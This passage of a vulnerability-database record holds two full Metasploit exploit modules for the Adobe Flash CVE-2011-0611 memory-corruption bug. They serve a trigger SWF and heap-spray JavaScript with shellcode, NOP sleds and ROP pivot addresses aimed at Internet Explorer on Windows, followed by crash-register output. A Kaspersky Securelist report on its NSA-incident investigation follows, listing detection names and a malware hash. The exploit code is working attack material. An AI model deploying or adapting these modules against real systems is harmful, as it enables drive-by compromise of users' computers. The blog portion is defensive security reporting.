in order to work properly.\n", "published": "2011-04-16T02:09:33", "type": "metasploit", "title": "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0611"], "modified": "2017-10-05T21:44:36", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_FLASHPLAYER_FLASH10O", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability in Adobe Flash Player that was discovered,\n and has been exploited actively in the wild. By embedding a specially crafted .swf\n file, Adobe Flash crashes due to an invalid use of an object type, which allows\n attackers to overwrite a pointer in memory, and results arbitrary code execution.\n Please note for IE 8 targets, Java Runtime Environment must be available on the\n victim machine in order to work properly.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'sinn3r',\n ],\n 'References' =>\n [\n [ 'CVE', '2011-0611' ],\n [ 'OSVDB', '71686' ],\n [ 'BID', '47314' ],\n [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-07.html' ],\n [ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx' ],\n [ 'URL', 'http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html' ],\n [ 'URL', 'http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html' ],\n [ 'URL', 'http://secunia.com/blog/210' ],\n ],\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => \"process\",\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [\n 'IE 6 on Windows XP SP3',\n {\n 'Rop' => false,\n 'Pivot' => nil, #No ROP no pivot\n 'Offset1' => '0x01', #For aligning the payload\n 'Offset2' => '0x02', #For aligning the CALL\n 'Max1' => '0x150', #First spray\n 'Max2' => '0x200' #Second spray\n }\n ],\n [\n 'IE 7 on Windows XP SP3',\n {\n 'Rop' => false,\n 'Pivot' => nil, #No ROP no pivot\n 'Offset1' => '0x01', #For aligning the payload\n 'Offset2' => '0x02', #For aligning the CALL\n 'Max1' => '0x150', #First spray\n 'Max2' => '0x200' #Second spray\n }\n ],\n [\n 'IE 8 on Windows XP SP3',\n {\n 'Rop' => true,\n 'Pivot' => 0x7c348b05, #XCHG EAX,ESP; RETN (MSVCR71.dll)\n 'Offset1' => '0x5E2', #Offset for rop+payload\n 'Offset2' => '0x02', #Offset to 0x11111110\n 'Max1' => '0x250', #First spray\n 'Max2' => '0x200' #Second spray\n }\n ],\n [\n 'IE 7 on Windows Vista',\n {\n 'Rop' => false,\n 'Pivot' => nil, #No ROP no pivot\n 'Offset1' => '0x01', #For aligning the payload\n 'Offset2' => '0x02', #For aligning the CALL\n 'Max1' => '0x150', #First spray\n 'Max2' => '0x200' #Second spray\n }\n ],\n [\n 'IE 8 on Windows 7',\n {\n 'Rop' => true,\n 'Pivot' => 0x7c348b05, #XCHG EAX,ESP; RETN (MSVCR71.dll)\n 'Offset1' => '0x5F4', #Offset for rop+payload\n 'Offset2' => '0x02', #Offset to 0x11111110\n 'Max1' => '0x101', #First spray\n 'Max2' => '0x300' #Second spray\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Apr 11 2011\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', true])\n ], self.class\n )\n\n end\n\n def exploit\n path = File.join(Msf::Config.data_directory, \"exploits\", \"CVE-2011-0611.swf\")\n f = File.open(path, \"rb\")\n @trigger = f.read(f.stat.size)\n f.close\n super\n end\n\n def get_target(request)\n agent = request.headers['User-Agent']\n\n if agent =~ /NT 5\\.1/ and agent =~ /MSIE 6\\.0/\n #Windows XP SP3 + IE 6.0\n return targets[1]\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 7\\.0/\n #Windows XP SP3 + IE 7.0\n return targets[2]\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8\\.0/\n #Windows XP SP3 + IE 8.0 + JRE6\n return targets[3]\n elsif agent =~ /NT 6\\.0/ and agent =~ /MSIE 7\\.0/\n #Windows Vista + IE 7\n return targets[4]\n elsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 8\\.0/\n #Windows 7 + IE 8 + JRE6\n return targets[5]\n else\n return nil\n end\n end\n\n def on_request_uri(cli, request)\n #Set default target\n my_target = target\n\n #If user chooses automatic target, we choose one based on user agent\n if my_target.name =~ /Automatic/\n my_target = get_target(request)\n if my_target.nil?\n print_error(\"Sending 404 for unknown user-agent\")\n send_not_found(cli)\n return\n end\n vprint_status(\"Target selected: #{my_target.name}\")\n end\n\n vprint_status(\"URL: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n #Browser requests our trigger file, why not\n print_status(\"Sending trigger SWF...\")\n send_response(cli, @trigger, {'Content-Type'=>'application/x-shockwave-flash'} )\n return\n end\n\n #Targets that don't need ROP\n pivot = \"\\xb8\\x0c\\x0c\\x0c\\x0c\" #MOV EAX,0x0c0c0c0c\n pivot << \"\\xff\\xe0\" #JMP EAX\n pivot << \"\\x41\" #Pad\n\n #Targets that need ROP\n if my_target['Rop']\n #Target Addr=0x11111110\n pivot =\n [\n 0x0c0c0c0c, # Padding. Value for ESP after the XCHG pivot\n my_target['Pivot'], # ROP Pivot\n 0x7c346b52, # EAX (POP ESP; RETN)\n ].pack('V*')\n\n #Target Addr=0x0c0c0c0c\n p = generate_rop_payload('java', payload.encoded)\n else\n p = payload.encoded\n end\n\n arch = Rex::Arch.endian(my_target.arch)\n\n shellcode = Rex::Text.to_unescape(p, arch)\n pivot = Rex::Text.to_unescape(pivot, arch)\n\n #Extract string based on target\n if my_target.name == 'IE 8 on Windows 7'\n js_extract_str = \"var block = shellcode.substring(0, (0x7ff00-6)/2);\"\n elsif my_target.name == 'IE 8 on Windows XP SP3'\n js_extract_str = \"var block = shellcode.substring(2, (0x40000-0x21)/2);\"\n else\n js_extract_str = \"var block = shellcode.substring(0, (0x80000-6)/2);\"\n end\n\n randnop = rand_text_alpha(rand(100) + 1)\n js_nops = Rex::Text.to_unescape(\"\\x0c\"*4)\n\n js = <<-JS\n function heap_spray(heaplib, nops, code, offset, max) {\n while (nops.length < 0x2000) nops += nops;\n var offset = nops.substring(0, offset);\n var shellcode = offset + code + nops.substring(0, 0x2000-code.length-offset.length);\n while (shellcode.length < 0x40000) shellcode += shellcode;\n #{js_extract_str}\n heaplib.gc();\n for (var i=1; i<max; i++) {\n heaplib.alloc(block);\n }\n }\n\n var heap_obj = new heapLib.ie(0x20000);\n var #{randnop} = \"#{js_nops}\";\n var nops = unescape(#{randnop});\n var code = unescape(\"#{shellcode}\");\n heap_spray(heap_obj, nops, code, #{my_target['Offset1']}, #{my_target['Max1']});\n var fake_pointers = unescape(\"#{pivot}\");\n heap_spray(heap_obj, fake_pointers, fake_pointers, #{my_target['Offset2']}, #{my_target['Max2']});\n JS\n\n js = heaplib(js, {:noobfu => true} )\n\n #Javascript obfuscation is optional\n if datastore['OBFUSCATE']\n js = ::Rex::Exploitation::JSObfu.new(js)\n js.obfuscate(memory_sensitive: true)\n end\n\n trigger_file_name = \"#{get_resource}/#{rand_text_alpha(rand(3))}.swf\"\n\n html = <<-EOS\n <html>\n <head>\n <script>\n #{js}\n </script>\n </head>\n <body>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"0\" height=\"0\"\n codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\">\n <param name=\"movie\" value=\"#{trigger_file_name}\" />\n <embed src=\"#{trigger_file_name}\" quality=\"high\" type=\"application/x-shockwave-flash\"\n pluginspage=\"http://www.macromedia.com/go/getflashplayer\">\n </embed>\n </body>\n </html>\n EOS\n\n html = html.gsub(/^ {4}/, \"\")\n\n print_status(\"Sending HTML to...\")\n send_response(cli, html, {'Content-Type' => \"text/html\"} )\n end\nend\n\n\n=begin\n0:000> r\neax=11111110 ebx=00000000 ecx=01d650b0 edx=00000007 esi=0013c2f0 edi=01d650b0\neip=100d01f6 esp=0013c12c ebp=0013c230 iopl=0 nv up ei pl nz na po nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202\nFlash10o+0xd01f6:\n100d01f6 ff5008 call dword ptr [eax+8] ds:0023:11111118=????????\n0:000> dd ecx\n01d650b0 11111110 00000000 00000000 00000000\n01d650c0 00000000 00000000 00000000 00000000\n01d650d0 00000000 00000000 00000000 00000000\n01d650e0 00000000 00000000 00000000 00000000\n01d650f0 00000000 00000000 00000000 00000000\n01d65100 00000000 00000000 00000000 00000000\n01d65110 00000000 00000000 00000000 00000000\n01d65120 00000000 00000000 00000000 00000000\n\n=end\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:16:21", "description": "", "published": "2011-04-17T00:00:00", "type": "packetstorm", "title": "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0611"], "modified": "2011-04-17T00:00:00", "id": "PACKETSTORM:100507", "href": "https://packetstormsecurity.com/files/100507/Adobe-Flash-Player-10.2.153.1-SWF-Memory-Corruption-Vulnerability.html", "sourceData": "`## \n# $Id: adobe_flashplayer_flash10o.rb 12330 2011-04-16 02:09:33Z sinn3r $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability\", \n'Description' => %q{ \nThis module exploits a vulnerability in Adobe Flash Player that was discovered, and \nhas been exploited actively in the wild. By embedding a specially crafted .swf file, \nAdobe Flash crashes due to an invalid use of an object type, which allows attackers to \noverwrite a pointer in memory, and results arbitrary code execution. \n}, \n'License' => MSF_LICENSE, \n'Version' => \"$Revision: 12330 $\", \n'Author' => \n[ \n'sinn3r', \n], \n'References' => \n[ \n[ 'CVE', '2011-0611' ], \n[ 'OSVDB', '71686' ], \n[ 'BID', '47314' ], \n[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-07.html' ], \n[ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx' ], \n[ 'URL', 'http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html' ], \n[ 'URL', 'http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html' ], \n[ 'URL', 'http://secunia.com/blog/210' ], \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\", \n}, \n'DefaultOptions' => \n{ \n'ExitFunction' => \"process\", \n'InitialAutoRunScript' => 'migrate -f', \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'IE 6/7 on Windows XP SP3 and Windows Vista', {} ], \n], \n'Privileged' => false, \n'DisclosureDate' => \"Apr 11 2011\", \n'DefaultTarget' => 0)) \nend \n \ndef on_request_uri(cli, request) \n \nagent = request.headers['User-Agent'] \nif agent !~ /MSIE \\d\\.\\d/ and agent !~ /NT \\d\\.\\d/ \nsend_not_found(cli) \nreturn \nend \n \nif request.uri =~ /\\.swf/ \nprint_status(\"Sending trigger SWF...\") \nsend_response(cli, @trigger, {'Content-Type'=>'application/x-shockwave-flash'} ) \nreturn \nend \n \nshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) \nnopsled = Rex::Text.to_unescape( [0x0c0c0c0c].pack('V') * 8 , Rex::Arch.endian(target.arch)) \n \nswf_name = rand_text_alpha(rand(3)) \njs_func_name = rand_text_alpha(rand(6) +3) \njs_var_blocks_name = rand_text_alpha(rand(6) + 3) \njs_var_shell_name = rand_text_alpha(rand(6) + 3) \njs_var_nopsled_name = rand_text_alpha(rand(6) + 3) \njs_var_index_name = rand_text_alpha(rand(6) + 3) \njs_var_padding_offset = rand_text_alpha(rand(6) + 3) \ntrigger_file_name = \"#{get_resource}/#{swf_name}.swf\" \n \nhtml = <<-EOS \n<html> \n<head> \n<script> \nfunction #{js_func_name}() { \nvar #{js_var_blocks_name} = new Array(); \nvar #{js_var_shell_name} = unescape(\"#{shellcode}\"); \nvar #{js_var_nopsled_name} = unescape(\"#{nopsled}\"); \nvar #{js_var_padding_offset} = #{js_var_shell_name}.length; \nwhile (#{js_var_nopsled_name}.length < 0x10101) { #{js_var_nopsled_name} += unescape(\"#{nopsled}\") }; \n#{js_var_nopsled_name} = #{js_var_nopsled_name}.substring(#{js_var_padding_offset}, #{js_var_nopsled_name}.length); \n#{js_var_blocks_name}[0] = #{js_var_nopsled_name} + #{js_var_shell_name}; \nfor (#{js_var_index_name}=1; #{js_var_index_name} < 0x802; #{js_var_index_name}++) { \n#{js_var_blocks_name}[#{js_var_index_name}] = #{js_var_blocks_name}[0].substring(0, #{js_var_blocks_name}[0].length); \n} \n} \n#{js_func_name}(); \n</script> \n</head> \n<body> \n<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"0\" height=\"0\" \ncodebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\"> \n<param name=\"movie\" value=\"#{trigger_file_name}\" /> \n<embed src=\"#{trigger_file_name}\" quality=\"high\" type=\"application/x-shockwave-flash\" \npluginspage=\"http://www.macromedia.com/go/getflashplayer\"> \n</embed> \n</body> \n</html> \nEOS \n \nhtml = html.gsub(/^\\t\\t/, \"\") \n \nprint_status(\"Sending malicious HTML to #{cli.peerhost}:#{cli.peerport}\") \nsend_response(cli, html, {'Content-Type' => \"text/html\"} ) \nend \n \ndef exploit \npath = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2011-0611.swf\") \nf = File.open(path, \"rb\") \n@trigger = f.read(f.stat.size) \nf.close \n \nsuper \nend \nend \n \n \n=begin \n0:000> r \neax=11111110 ebx=00000000 ecx=01d650b0 edx=00000007 esi=0013c2f0 edi=01d650b0 \neip=100d01f6 esp=0013c12c ebp=0013c230 iopl=0 nv up ei pl nz na po nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202 \nFlash10o+0xd01f6: \n100d01f6 ff5008 call dword ptr [eax+8] ds:0023:11111118=???????? \n0:000> dd ecx \n01d650b0 11111110 00000000 00000000 00000000 \n01d650c0 00000000 00000000 00000000 00000000 \n01d650d0 00000000 00000000 00000000 00000000 \n01d650e0 00000000 00000000 00000000 00000000 \n01d650f0 00000000 00000000 00000000 00000000 \n01d65100 00000000 00000000 00000000 00000000 \n01d65110 00000000 00000000 00000000 00000000 \n01d65120 00000000 00000000 00000000 00000000 \n=end`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/100507/adobe_flashplayer_flash10o.rb.txt"}], "securelist": [{"lastseen": "2017-11-27T08:03:02", "bulletinFamily": "blog", "cvelist": ["CVE-2009-3869", "CVE-2010-0094", "CVE-2010-0188", "CVE-2010-0480", "CVE-2010-0840", "CVE-2010-0842", "CVE-2010-1297", "CVE-2010-3563", "CVE-2010-3653", "CVE-2010-3654", "CVE-2011-0609", "CVE-2011-0611", "CVE-2011-3400", "CVE-2011-3544", "CVE-2012-0507", "CVE-2012-0754", "CVE-2012-1723", "CVE-2012-4681", "CVE-2013-0422", "CVE-2013-0431", "CVE-2013-2171", "CVE-2013-2423"], "description": "![no-image](https://securelist.com/wp-content/themes/securelist/images/article-default/abstraction_5.jpg)\n\n## Background\n\nIn early October, a story was published by the Wall Street Journal alleging Kaspersky Lab software was used to siphon classified data from an NSA employee's home computer system. Given that Kaspersky Lab has been at the forefront of fighting cyberespionage and cybercriminal activities on the Internet for over 20 years now, these allegations were treated very seriously. To assist any independent investigators and all the people who have been asking us questions whether those allegations were true, we decided to conduct an internal investigation to attempt to answer a few questions we had related to the article and some others that followed it:\n\n 1. Was our software used outside of its intended functionality to pull classified information from a person's computer?\n 2. When did this incident occur?\n 3. Who was this person?\n 4. Was there actually classified information found on the system inadvertently?\n 5. If classified information was pulled back, what happened to said data after? Was it handled appropriately?\n 6. Why was the data pulled back in the first place? Is the evidence this information was passed on to \"Russian Hackers\" or Russian intelligence?\n 7. What types of files were gathered from the supposed system?\n 8. Do we have any indication the user was subsequently \"hacked\" by Russian hackers and data exfiltrated?\n 9. Could Kaspersky Lab products be secretly used to intentionally siphon sensitive data unrelated to malware from customers' computers?\n 10. Assuming cyberspies were able to see the screens of our analysts, what could they find on it and how could that be interpreted?\n\nAnswering these questions with factual information would allow us to provide reasonable materials to the media, as well as show hard evidence on what exactly did or did not occur, which may serve as a food for thought to everyone else. To further support the objectivity of the internal investigation we ran our investigation using multiple analysts of non-Russian origin and working outside of Russia to avoid even potential accusations of influence.\n\n## The Wall Street Journal Article\n\nThe article published in October laid out some specifics that need to be documented and fact checked. Important bullet points from the article include:\n\n * The information \"stolen\" provides details on how the U.S. penetrates foreign computer networks and defends against cyberattacks.\n * A National Security Agency contractor removed the highly classified material and put it on his home computer.\n * The data ended up in the hands of so called \"Russian hackers\" after the files were detected using Kaspersky Lab software.\n * The incident occurred in 2015 but wasn't discovered until spring of last year [2016].\n * The Kaspersky Lab linked incident predates the arrest last year of another NSA contractor, Harold Martin.\n * \"Hackers\" homed in on the machine and stole a large amount of data after seeing what files were detected using Kaspersky data.\n\n## Beginning of Search\n\nHaving all of the data above, the first step in trying to answer these questions was to attempt to identify the supposed incident. Since events such as what is outlined above only occur very rarely, and we diligently keep the history of all operations, it should be possible to find them in our telemetry archive given the right search parameters.\n\nThe first assumption we made during the search is that whatever data was allegedly taken, most likely had to do with the so-called Equation Group, since this was the major research in active stage during the time of alleged incident as well as many existing links between Equation Group and NSA highlighted by the media and some security researchers. Our Equation signatures are clearly identifiable based on the malware family names, which contain words including \"Equestre\", \"Equation\", \"Grayfish\", \"Fanny\", \"DoubleFantasy\" given to different tools inside the intrusion set. Taking this into account, we began running searches in our databases dating back to June 2014 (6 months prior to the year the incident allegedly happened) for all alerts triggered containing wildcards such as \"HEUR:Trojan.Win32.Equestre.*\". Results showed quickly: we had a few test (silent) signatures in place that produced a LARGE amount of false positives. This is not something unusual in the process of creating quality signatures for a rare piece of malware. To alleviate this, we sorted results by count of unique hits and quickly were able to zoom in on some activity that happened in September 2014. It should be noted that this date is technically not within the year that the incident supposedly happened, but we wanted to be sure to cover all bases, as journalists and sources sometimes don't have all the details.\n\nBelow is a list of all hits in September for an \"Equestre\" signature, sorted by least amount to most. You can quickly identify the problem signature(s) mentioned above.\n\nDetection name (silent) | Count \n---|--- \nHEUR:Trojan.Win32.Equestre.u | 1 \nHEUR:Trojan.Win32.Equestre.gen.422674 | 3 \nHEUR:Trojan.Win32.Equestre.gen.422683 | 3 \nHEUR:Trojan.Win32.Equestre.gen.427692 | 3 \nHEUR:Trojan.Win32.Equestre.gen.427696 | 4 \nHEUR:Trojan.Win32.Equestre.gen.446160 | 6 \nHEUR:Trojan.Win32.Equestre.gen.446979 | 7 \nHEUR:Trojan.Win32.Equestre.g | 8 \nHEUR:Trojan.Win32.Equestre.ab | 9 \nHEUR:Trojan.Win32.Equestre.y | 9 \nHEUR:Trojan.Win32.Equestre.l | 9 \nHEUR:Trojan.Win32.Equestre.ad | 9 \nHEUR:Trojan.Win32.Equestre.t | 9 \nHEUR:Trojan.Win32.Equestre.e | 10 \nHEUR:Trojan.Win32.Equestre.v | 14 \nHEUR:Trojan.Win32.Equestre.gen.427697 | 18 \nHEUR:Trojan.Win32.Equestre.gen.424814 | 18 \nHEUR:Trojan.Win32.Equestre.s | 19 \nHEUR:Trojan.Win32.Equestre.x | 20 \nHEUR:Trojan.Win32.Equestre.i | 24 \nHEUR:Trojan.Win32.Equestre.p | 24 \nHEUR:Trojan.Win32.Equestre.q | 24 \nHEUR:Trojan.Win32.Equestre.gen.446142 | 34 \nHEUR:Trojan.Win32.Equestre.d | 39 \nHEUR:Trojan.Win32.Equestre.j | 40 \nHEUR:Trojan.Win32.Equestre.gen.427734 | 53 \nHEUR:Trojan.Win32.Equestre.gen.446149 | 66 \nHEUR:Trojan.Win32.Equestre.ag | 142 \nHEUR:Trojan.Win32.Equestre.b | 145 \nHEUR:Trojan.Win32.Equestre.h | 310 \nHEUR:Trojan.Win32.Equestre.gen.422682 | 737 \nHEUR:Trojan.Win32.Equestre.z | 1389 \nHEUR:Trojan.Win32.Equestre.af | 2733 \nHEUR:Trojan.Win32.Equestre.c | 3792 \nHEUR:Trojan.Win32.Equestre.m | 4061 \nHEUR:Trojan.Win32.Equestre.k | 6720 \nHEUR:Trojan.Win32.Equestre.exvf.1 | 6726 \nHEUR:Trojan.Win32.Equestre.w | 6742 \nHEUR:Trojan.Win32.Equestre.f | 9494 \nHEUR:Trojan.Win32.Equestre.gen.446131 | 26329 \nHEUR:Trojan.Win32.Equestre.aa | 87527 \nHEUR:Trojan.Win32.Equestre.gen.447002 | 547349 \nHEUR:Trojan.Win32.Equestre.gen.447013 | 1472919 \n \nTaking this list of alerts, we started at the top and worked our way down, investigating each hit as we went trying to see if there were any indications it may be related to the incident. Most hits were what you would think: victims of Equation or false positives. Eventually we arrived at a signature that fired a large number of times in a short time span on one system, specifically the signature \"HEUR:Trojan.Win32.Equestre.m\" and a 7zip archive (referred below as \"[undisclosed].7z\"). Given limited understanding of Equation at the time of research it could have told our analysts that an archive file firing on these signatures was an anomaly, so we decided to dig further into the alerts on this system to see what might be going on. After analyzing the alerts, it was quickly realized that this system contained not only this archive, but many files both common and unknown that indicated this was probably a person related to the malware development. Below is a list of Equation specific signatures that fired on this system over a period of approximately three months:\n\nHEUR:Trojan.Win32.Equestre.e \nHEUR:Trojan.Win32.Equestre.exvf.1 \nHEUR:Trojan.Win32.Equestre.g \nHEUR:Trojan.Win32.Equestre.gen.424814 \nHEUR:Trojan.Win32.Equestre.gen.427693 \nHEUR:Trojan.Win32.Equestre.gen.427696 \nHEUR:Trojan.Win32.Equestre.gen.427697 \nHEUR:Trojan.Win32.Equestre.gen.427734 \nHEUR:Trojan.Win32.Equestre.gen.446142 \nHEUR:Trojan.Win32.Equestre.gen.446993 \nHEUR:Trojan.Win32.Equestre.gen.465795 \nHEUR:Trojan.Win32.Equestre.i \nHEUR:Trojan.Win32.Equestre.j \nHEUR:Trojan.Win32.Equestre.m \nHEUR:Trojan.Win32.Equestre.p \nHEUR:Trojan.Win32.Equestre.q \nHEUR:Trojan.Win32.Equestre.x \nHEUR:Trojan.Win32.GrayFish.e \nHEUR:Trojan.Win32.GrayFish.f\n\nIn total we detected 37 unique files and 218 detected objects, including executables and archives containing malware associated with the Equation Group. Looking at this metadata during current investigation we were tempted to include the full list of detected files and file paths into current report, however, according to our ethical standards, as well as internal policies, we cannot violate our users' privacy. This was a hard decision, but should we make an exception once, even for the sake of protecting our own company's reputation, that would be a step on the route of giving up privacy and freedom of all people who rely on our products. Unless we receive a legitimate request originating from the owner of that system or a higher legal authority, we cannot release such information.\n\nThe file paths observed from these detections indicated that a developer of Equation had plugged in one or more removable drives, AV signatures fired on some of executables as well as archives containing them, and any files detected (including archives they were contained within) were automatically pulled back. At this point in time, we felt confident we had found the source of the story fed to Wall Street Journal and others. Since this type of event clearly does not happen often, we believe some dates were mixed up or not clear from the original source of the leak to the media.\n\nOur next task was to try and answer what may have happened to the data that was pulled back. Clearly an archive does not contain only those files that triggered, and more than likely contained a possible treasure trove of data pertaining to the intrusion set. It was soon discovered that the actual archive files themselves appear to have been removed from our storage of samples, while the individual files that triggered the alerts remained.\n\nUpon further inquiring about this event and missing files, it was later discovered that at the direction of the CEO, the archive file, named \"[undisclosed].7z\" was removed from storage. Based on description from the analyst working on that archive, it contained a collection of executable modules, four documents bearing classification markings, and other files related to the same project. The reason we deleted those files and will delete similar ones in the future is two-fold; We don't need anything other than malware binaries to improve protection of our customers and secondly, because of concerns regarding the handling of potential classified materials. Assuming that the markings were real, such information cannot and will not consumed even to produce detection signatures based on descriptions.\n\nThis concern was later translated into a policy for all malware analysts which are required to delete any potential classified materials that have been accidentally collected during anti-malware research or received from a third party. Again to restate: to the best of our knowledge, it appears the archive files and documents were removed from our storage, and only individual executable files (malware) that were already detected by our signatures were left in storage. Also, it is very apparent that no documents were actively \"detected on\" during this process. In other words, the only files that fired on specific Equation signatures were binaries, contained within an archive or outside of it. The documents were inadvertently pulled back because they were contained within the larger archive file that alerted on many Equation signatures. According to security software industry standards, requesting a copy of an archive containing malware is a legitimate request, which often helps security companies locate data containers used by malware droppers (i.e. they can be self-extracting archives or even infected ISO files).\n\n## An Interesting Twist\n\nDuring the investigation, we also discovered a very interesting twist to the story that has not been discussed publicly to our knowledge. Since we were attempting to be as thorough as possible, we analyzed EVERY alert ever triggered for the specific system in question and came to a very interesting conclusion. It appears the system was actually compromised by a malicious actor on October 4, 2014 at 23:38 local time, specifically by a piece of malware hidden inside a malicious MS Office ISO, specifically the \"setup.exe\" file (md5: a82c0575f214bdc7c8ef5a06116cd2a4 - for [detection coverage, see this VirusTotal link](<https://www.virustotal.com/#/file/6bcd591540dce8e0cef7b2dc6a378a10d79f94c3217bca5f05db3c24c2036340/detection>)) .\n\nLooking at the sequence of events and detections on this system, we quickly noticed that the user in question ran the above file with a folder name of \"Office-2013-PPVL-x64-en-US-Oct2013.iso\". What is interesting is that this ISO file is malicious and was mounted and subsequently installed on the system along with files such as \"kms.exe\" (a name of a popular pirated software activation tool), and \"kms.activator.for.microsoft.windows.8.server.2012.and.office.2013.all.editions\". Kaspersky Lab products detected the malware with the verdict **Backdoor.Win32.Mokes.hvl**.\n\nAt a later time after installation of the supposed MS Office 2013, the antivirus began blocking connections out on a regular basis to the URL \"http://xvidmovies[.]in/dir/index.php\". Looking into this domain, we can quickly find other malicious files that beacon to the same URL. It's important to note that the reason we know the system was beaconing to this URL is because we were actively blocking it as it was a known bad site. This does however indicate the user actively downloaded / installed malware on the same system around the same time frame as our detections on the Equation files.\n\nTo install and run this malware, the user must have disabled Kaspersky Lab products on his machine. Our telemetry does not allow us to say when the antivirus was disabled, however, the fact that the malware was later detected as running in the system suggests the antivirus had been disabled or was not running when the malware was run. **Executing the malware would not have been possible with the antivirus enabled**.\n\nAdditionally, there also may have been other malware from different downloads that we were unaware of during this time frame. Below is a complete list of the 121 non-Equation specific alerts seen on this system over the two month time span:\n\nBackdoor.OSX.Getshell.k \nBackdoor.Win32.Mokes.hvl \nBackdoor.Win32.Shiz.gpmv \nBackdoor.Win32.Swrort.dbq \nDangerousObject.Multi.Chupitio.a \nExploit.Java.Agent.f \nExploit.Java.CVE-2009-3869.a \nExploit.Java.CVE-2010-0094.bb \nExploit.Java.CVE-2010-0094.e \nExploit.Java.CVE-2010-0094.q \nExploit.Java.CVE-2010-0840.gm \nExploit.Java.CVE-2010-0842.d \nExploit.Java.CVE-2010-3563.a \nExploit.Java.CVE-2011-3544.ac \nExploit.Java.CVE-2012-0507.al \nExploit.Java.CVE-2012-0507.je \nExploit.Java.CVE-2012-1723.ad \nExploit.Java.CVE-2012-4681.l \nExploit.JS.Aurora.a \nExploit.MSVisio.CVE-2011-3400.a \nExploit.Multi.CVE-2012-0754.a \nExploit.OSX.Smid.b \nExploit.SWF.CVE-2010-1297.c \nExploit.SWF.CVE-2011-0609.c \nExploit.SWF.CVE-2011-0611.ae \nExploit.SWF.CVE-2011-0611.cd \nExploit.Win32.CVE-2010-0188.a \nExploit.Win32.CVE-2010-0480.a \nExploit.Win32.CVE-2010-3653.a \nExploit.Win32.CVE-2010-3654.a \nHackTool.Win32.Agent.vhs \nHackTool.Win32.PWDump.a \nHackTool.Win32.WinCred.e \nHackTool.Win32.WinCred.i \nHackTool.Win64.Agent.b \nHackTool.Win64.WinCred.a \nHackTool.Win64.WinCred.c \nHEUR:Exploit.FreeBSD.CVE-2013-2171.a \nHEUR:Exploit.Java.CVE-2012-1723.gen \nHEUR:Exploit.Java.CVE-2013-0422.gen \nHEUR:Exploit.Java.CVE-2013-0431.gen \nHEUR:Exploit.Java.CVE-2013-2423.gen \nHEUR:Exploit.Java.Generic \nHEUR:Exploit.Script.Generic \nHEUR:HackTool.AndroidOS.Revtcp.a \nHEUR:Trojan-Downloader.Script.Generic \nHEUR:Trojan-FakeAV.Win32.Onescan.gen \nHEUR:Trojan.Java.Generic \nHEUR:Trojan.Script.Generic \nHEUR:Trojan.Win32.Generic \nHoax.Win32.ArchSMS.cbzph \nKHSE:Exploit.PDF.Generic.a \nnot-a-virus:AdWare.JS.MultiPlug.z \nnot-a-virus:AdWare.NSIS.Agent.bx 